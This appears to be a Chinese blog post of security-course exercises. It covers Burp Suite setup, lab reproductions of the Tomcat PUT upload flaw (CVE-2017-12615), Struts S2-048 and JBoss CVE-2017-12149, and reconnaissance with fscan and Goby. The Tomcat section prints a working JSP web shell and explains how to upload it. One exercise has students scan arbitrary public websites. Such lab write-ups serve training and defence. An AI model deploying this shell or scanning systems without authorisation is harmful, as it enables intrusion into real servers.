网络安全C10-2024.8.31

练习如下内容:

1、安装burp并实现抓取HTTP站点的数据包;

Burp 是一个集成化的渗透测试工具,它集合了各种渗透组件,使得我们能够更好地自动化或手动完成对web的渗透测试或攻击。

原理:拦截所有经过代理的网络流量,包含客户端发送的请求信息、服务器端返回的信息。

正常情况在访问时为:客户端 <===> 服务器端,而Burp是为中间代理,位置在于客户端与服务器之间,所以所用浏览器需要设置为burp代理,即通过查看如下然后设置浏览器代理;

安装设置:burp在首次使用时需要环境支持,前提是需要安装与配置Java环境变量(这里jdk,jre的版本为1.84),在环境变量系统变量中填加如下三个配置:

classpath
.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;


JAVA_HOME
jdk文件夹的绝对路径


Path
%JAVA_HOME%\bin

burp的抓包在proxy模块中,点击Intercept is on开启与关闭抓包;

2、复现Tomcat PUT方法任意写文件漏洞(CVE-2017-12615),使用蚁剑链连接;

漏洞描述

Tomcat是Apache的一款轻量级Web应用服务器,它主要用于开发和调试JSP程序,适用于中小型系统,是一个中间件。

在Apache Tomcat 7.0.0版本至7.0.79版本存在远程代码执行漏洞。当上述版本的Tomcat启用HTTP PUT请求方法时,远程攻击者可以构造恶意请求利用该漏洞向服务器上传包含任意代码执行的jsp文件,并被服务器执行该文件,导致攻击者可以执行任意代码。

漏洞原理
漏洞本质是 Tomcat 的 web.xml 配置了可写(readonly=false),导致我们可以往服务器写入文件,对于Tomcat本身不允许上传 jsp 文件的限制,可以从命令规则入手,将1.jsp后面填加/,从而在从扩展名的识别中就不再是jsp文件了,但系统层面在保存文件过程中 1.jsp/不符合文件命令规则,故将1.jsp/更正为1.jsp,实现脚本上传的目地。 

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
   </init-param>
   <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
  </init-param>
  <init-param>
       <param-name>readonly</param-name>
       <param-value>false</param-value>
  </init-param>
  <load-on-startup>1</load-on-startup>
</servlet>

POC:

<%
    if("passwd".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

利用:

通过durp抓包,然后转到Repeater模块,对报报文进行更改,将GET更改为PUT,后面接上自定义文件名称,重点为文件名结尾的/符号,最下方接POC;

至此,通过jsp文件可以实现对所现环境的web Shell所有权限,可通过浏览器输入命令操控主机:

除实现web控制外,此漏洞利用其它工具可实现远程操作的目地,如利用蚁剑更改利用代码即可实现远程连接;

3、复现S2-048 远程代码执行漏洞(CVE-2017-9791);查看命令执行情况;

Apache Struts 1插件的Apache Struts 2.3.X版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2的兼容性。在Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限

影响版本:Apache Struts 2.3.x系列中启用了struts2-struts1-plugin插件的版本

复现:

利用docker下载CVE-2017-9791镜像,然后通过命令启动容器复现漏洞;

配合利用POC即可达到相应命令执行,达到RCE目地;

4、复现Boss 5.x/6.x反序列化漏洞(CVE-2017-12149),查看命令执行截图;

漏洞简介

该漏洞为 Java 反序列化错误类型,存在于 Jboss HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了攻击者可以在服务器上执行任意代码。

漏洞版本

漏洞影响5.x6.x版本的JBoss

漏洞复现:

通过docker复现环境,使用如下命令:

docker secarch CVE-2017-12149  

docker pull hackingpub/cve-2017-12149  

docker run -d -p 8085:8080 hackingpub/cve-2017-12149 

漏洞利用:

在利用上可以直接利用现成的工具进行,将复现环境地址复制到工具中进行远程操控;

5.以任一合法网站为目标进行信息收集练习并形成报告,要求使用fcsan、Goby;

fcsan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

在使用时可以-h  -u接IP段或者域名即可,如扫描我的靶场输出的结果十分详细;

Goby:

Goby是新一代的网络安全评估工具,与fscan类似Goby除扫描之外它还可以高效实用地扫描漏洞,同时为目标企业整理出最完整的攻击面信息。软件直接打开在右侧输入想要扫描的地址或地址段等信息,会自动将目录信息进行扫描,整体功能十分强大。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值